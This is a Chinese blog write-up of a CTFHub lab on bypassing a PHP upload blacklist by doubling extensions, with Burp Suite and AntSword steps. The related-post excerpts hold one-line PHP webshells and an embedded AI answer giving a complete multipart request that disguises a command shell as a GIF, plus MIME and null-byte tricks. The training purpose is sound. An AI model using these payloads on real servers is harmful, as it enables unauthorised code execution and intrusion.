【CTFHub】 文件上传 — 双写绕过

原创 已于 2022-08-08 09:43:55 修改 · 2.9k 阅读 · 12 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全性测试 #php

于 2022-08-06 20:12:55 首次发布

双写绕过原理:服务端对黑名单中的内容进行处理,且仅处理一次,所以可以通过双写后缀绕过.
       如,黑名单中有"php"字样,上传文件名为"1.php" 上传后文件变成"1.".
       
       
题解:

  • 第一步 先打开Burpsuite并开启拦截,然后在网站上传文件

在这里插入图片描述

  • 第二步 切至Burpsuite把拦截到的请求发送到转发器(send to repeater)

在这里插入图片描述

  • 第三步 在Burpsuite的转发器下修改文件后缀

在这里插入图片描述

  • 第四步 前面三步如果已经做好了,那么接下来使用蚁剑链接被入侵的服务器了

在这里插入图片描述

  • 第五步 测试连接成功之后,添加数据记录并访问目标服务器,点击上一层目录,打开"flag_xxx.php"文件,获取flag

最低0.47元/天 解锁文章
ctfhub 绕过 文件头检查
weixin_52268949的博客
03-30 433
绕过 进入环境 上传一句话木马 上传路径感觉不对检查源代码 从此处可以看出需要绕过 使用bp抓包 此处这样修改即可绕过 使用蚁剑连接 即可找到flag 文件头检查 进入环境 上传一句话木马发现 ‘ 使用bp抓包更改放包 使用这串代码制作图片木马 用winhex在最后加上一句话木马 再抓包修改 用蚁剑连接即可获得flag ...
CTFHub技能树web(持续更新)--文件上传--绕过
jiuyongpinyin的博客
12-01 685
绕过 题目提示绕过,首先我们上传一个一句话: 发现后缀被过滤掉了,构造的后缀: 上传成功,使用蚁剑或菜刀,获得flag: 注:萌新第一次write up,不足之处还请见谅,不对之处欢迎批评指正。 ...
CTFHub 文件上传-后缀绕过
最新发布
mooyuan的网络安全博客
09-23 1140
本文详细解析了CTFHub文件上传"后缀"绕过技术的原理与实战应用。绕过通过重复书危险后缀(如".pphphp")欺骗只执行一次字符串删除的过滤器,使其处理后仍保留可执行扩展名(".php")。文章从基本概念、核心原理到完整渗透流程进行了系统讲解,包括构建含GIF文件头的PHP木马、BurpSuite拦截修改上传请求、蚁剑连接WebShell等关键步骤。实战部分展示了如何利用插入性法(pphphp→php)成功绕过过滤,最终获取目标系统flag。
文件上传————ctfhub绕过
qq_45655564的博客
05-29 791
CTFHub 文件上传——绕过 可以看到源代码 $name = basename($_FILES['file']['name']); $blacklist = array("php", "php5", "php4", "php3", "phtml", "pht", "jsp", "jspa", "jspx", "jsw", "jsv", "jspf", "jtml", "asp", "aspx", "asa", "asax", "ascx", "ashx", "asmx", "cer", "swf",
文件上传--Upload-labs--Pass10--绕过
2302_79800344的博客
02-19 1215
绕过str_ireplace()函数
CTFHUB-文件上传-绕过
weixin_68416970的博客
08-02 274
CTFHUB技能树、文件上传漏洞、绕过的过关教程
ctfhub-前端验证,.htaccess,MIME绕过,文件头检查,00截断,后缀
weixin_55702959的博客
02-02 1586
目录 文件上传-前端验证 文件上传-.htaccess 文件上传-MIME绕过 文件上传-文件头检查 文件上传-00截断 文件上传-后缀 eval执行 文件上传-前端验证 上传文件时,客户端的javascript会对文件的类型进行一个校验,只允许 “.jpg” “.png” ".gif"的文件上传,于是关掉他 about:config 一句木马 <?php @eval($_POST['123']); ?> 命名为1.php之后上传文件,用蚁剑打...
CTFHUB-文件上传
m0_64180167的博客
12-25 1562
注意要改名字 我在这出现了问题是我没改文件名字 一直上传失败 于是我又在后缀上加.php才上传成功。发现失败了 试错后发现 我们一定要把上传文件的后缀名改为。于是我们了解到i我们可以运用一句话木马 进行漏洞上传。我使用kali 在桌面新建立一个文件 输入该代码保存。注意 添加的不只是地址栏的URL 还要加上相对路径。发现可以了于是我们直接进入后台 发现flag。文件上传 并且提示我们是无限制的。出现了路径 于是我们打开中国蚁剑。打开我们安装蚁剑的文件夹。于是我们尝试直接上传。
CTFHub技能书解题笔记-文件上传-后缀
qq_43006864的博客
01-13 1305
打开题目 后缀绕过,这里适用于前后端都对文件的扩展名做了限制。我们可以通过文件的扩展名,达到绕过的目的。例如:xxx.php=>xxx.pphphp. 开始解题。 直接打开burpsuit进行抓包,上传马子。 然后文件后缀。 成功上传并执行。 拿到flag。 这里漏洞的原理就是,文件后缀名过滤的时候.pphphp。他会把中间的php当做危险用户名过滤为空,所以首字母的p和尾部的hp会再次组合为php,再进行执行的时候,我们这里仍...
CTF-web题 绕过
2302_80276789的博客
07-22 1362
他要求我们在attitude中寻找和gain相同的字符串,找到之后替换为中间的空,当替换得到的precoce和原来的gain more相等的时候就可以满足条件。y1ng_pretty_handsome这是要去验证的字符串,那么我们可以成以下形式yy1ng_pretty_handsome1ng_pretty_handsome,我们可以在里面再加入一次这个字符串,那么当重复的被替换为空的时候那么就会剩下想要的字符串。这是打开之后的题目,看不到有用的信息,因此我们打开F12,进行观察,
ctfhub-绕过
m0_62094846的博客
12-09 162
上传1.php,只返回1. ,php被过滤了 然后就可以蚁剑连接了
28-2 文件上传漏洞 - 绕过
weixin_43263566的博客
03-19 710
在代码编过程中,绕过原理指的是只对黑名单中的内容进行一次空替换。由于只进行一次替换,导致了绕过的情况。具体来说,这种绕过技术可以通过在文件名后面添加额外的字符来实现。例如,将黑名单中的后缀名替换为空,而实际上添加了额外的字符(比如"pph"),使得最终文件后缀名变为。这种方法利用了只替换一次的特性,在绕过黑名单检测的同时保留了原本的文件类型(如。正常的上传一个php文件看看。
CTF-WEB 文件上传绕过技巧
qq_51659538的博客
11-13 1177
ctf web 文件上传漏洞 绕过
文件上传(包括编辑器上传)漏洞绕过总结(适用于pte考试、ctf及常规测试、修复任意文件上传漏洞可做参考)
weixin_42075643的博客
03-28 4399
文件上传绕过总结;编辑器文件上传;渗透测试记录
buuctf(babysql)(绕过)
qq_75005708的博客
04-10 434
这道题最明显的是绕过,然后我们需要去拼接语句达到绕过的目的,的方式也不一定是固定的,这道题在我们尝试的时候也会发现其实它也过滤好几个单词,有时候我们需要部分,也不需要整个单词,因为它不是整个单词都过滤。如果我们在尝试这条语句的时候,发现报错,可能是环境的问题,我们用括号把information到tables括起来就不用空格了,一般情况下是不会有问题。然后我们就发现登陆成功,应该是or被过滤了,我们要绕过它,我们接着查看它的列数。我们发现2和3在页面显示,接着查看它的数据库。
文件上传绕过
weixin_34375054的博客
03-04 213
  对于整个HTTP请求包来说,所有内容都是用户可控的,只是请求包中的几个点有可能是后台服务器的检测重点: 1 Content-Length  上传内容大小 2 MAX_FILE_SIZE   上传内容的最大长度 3 filename      上传文件名 4 Content-Type   上传文件类型 5 请求包中的乱码字段  上传文件的内容 6 有可能存在请求包中的可控点还有...
文件上传绕过】十、利用后缀名绕过
ssrf
10-11 3516
文章目录一、实验环境二、源码三、后缀进行绕过 一、实验环境 服务端对敏感后缀名替换为空 本pass会从文件名中去除.php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html|.Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml|.asp|.asp
渗透测试-文件上传文件名和::$DATA绕过(四)
lza20001103的博客
04-17 3961
渗透测试-文件上传文件名和::$DATA绕过
【漏洞靶场】文件上传后端检测绕过--upload-labs
m0_46344990的博客
04-28 1413
一、漏洞描述 在upload-labs第十一关中,服务器脚本才用了黑名单的形式检测非法文件后缀,用了一系列函数来取得文件后缀名。使用str_ireplace()函数将非法后缀替换为空,函数意思是使用一个字符串替换另一个字符串中的一些字符,对大小不铭感。因为只替换一次,可以采用文件后缀的方法绕过检测。 二、漏洞发现 先在本地php脚本若上传成功,且知道上传后文件在网站保存的路径,可通过网页访问获得服务器配置信息,命名为z.php 直接看第十一关的代码,先用file_exists函数判断文件
ctfhub技能树文件上传MIME绕过
04-01
<think>好的,我需要解决用户在CTFHub文件上传绕过MIME类型检查的问题。首先,用户提到了需要修改Content-Type和文件名,但上传PHP小马后网页无法解析,可能需要特殊编码或字符变换。根据引用[2],MIME绕过需要同时处理Content-Type和filename,但用户遇到的问题是即使上传成功,PHP文件也无法解析,这可能与服务器的解析方式有关。 首先,我应该回顾MIME类型检查的基本绕过方法。通常,服务器会检查上传文件的Content-Type,比如要求image/jpeg。所以,在上传时,将Content-Type改为允许的类型,比如image/jpeg,同时保持文件内容为PHP代码。但有时候服务器还会检查文件扩展名,这时候可能需要扩展名,比如shell.php.jpg,或者使用空字节截断,如shell.php%00.jpg,但PHP版本升级后可能失效。 接下来,用户提到即使上传成功,网页无法解析PHP。这可能是因为服务器配置了白名单扩展名,只允许.jpg等,所以即使文件内容正确,服务器也不会执行。这时候需要利用解析漏洞,比如.htaccess文件覆盖,或者让服务器错误解析扩展名,比如上传shell.php.jpg,并利用Apache的解析漏洞(如从右向左解析,遇到不认识的后缀就左移一个,比如如果服务器配置了php解析.php和.phps,那么shell.php.xxx可能被解析为PHP)。 另外,引用[2]提到可能需要特殊编码或字符变换。这可能包括在PHP代码中使用十六进制、Unicode编码,或者插入特殊字符如空格、换行来绕过内容检测。例如,使用exif_imagetype()检查的绕过,需要在文件头添加图片的魔术字节,如GIF89a,同时后面接PHP代码。 解决方案步骤可能包括: 1. 修改Content-Type为image/jpeg。 2. 修改文件名为shell.php.jpg或使用如shell.pphphp。 3. 在文件内容前添加图片魔术字节,如GIF89a,并用注释符避免图片错误。 4. 利用服务器解析漏洞,如%00截断或.htaccess设置。 最后,生成相关问题需要考虑其他绕过方式、解析漏洞、内容检测绕过等。</think>### CTFHub文件上传MIME类型绕过技巧 #### 一、MIME类型检测原理 MIME类型检测是文件上传功能中最常见的安全校验机制,服务器通过检查HTTP请求头中的`Content-Type`字段判断文件类型。例如要求上传图片时,合法的MIME类型为`image/jpeg`、`image/png`等[^2]。 #### 二、绕过步骤 1. **修改Content-Type字段** 将PHP文件的`Content-Type`改为允许的类型(如`image/jpeg`),同时保持文件内容为PHP代码。 **示例请求头**: ``` Content-Type: image/jpeg ``` 2. **文件名处理** - **扩展名绕过**:若服务器仅检查后缀名,可使用`shell.php.jpg`格式,利用部分解析漏洞 - **空字节截断(需PHP版本<5.3)**:如`shell.php%00.jpg` - **大小混淆**:如`shell.PhP` 3. **文件内容绕过** - **添加图片魔术字节**:在PHP代码前插入`GIF89a`等文件头,绕过`exif_imagetype()`检测 ```php GIF89a <?php @eval($_POST['cmd']); ?> ``` - **注释符处理**:使用`/* ... */`包裹恶意代码,避免破坏文件结构 #### 三、完整Payload示例 ```http POST /upload.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABC123 ------WebKitFormBoundaryABC123 Content-Disposition: form-data; name="file"; filename="shell.php.jpg" Content-Type: image/jpeg GIF89a <?php system($_GET['cmd']); ?> ------WebKitFormBoundaryABC123-- ``` #### 四、验证与调试 1. 使用Burp Suite拦截上传请求,修改`Content-Type`和文件名 2. 上传后访问文件路径,确认是否解析为PHP(如`/uploads/shell.php.jpg?cmd=ls`)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值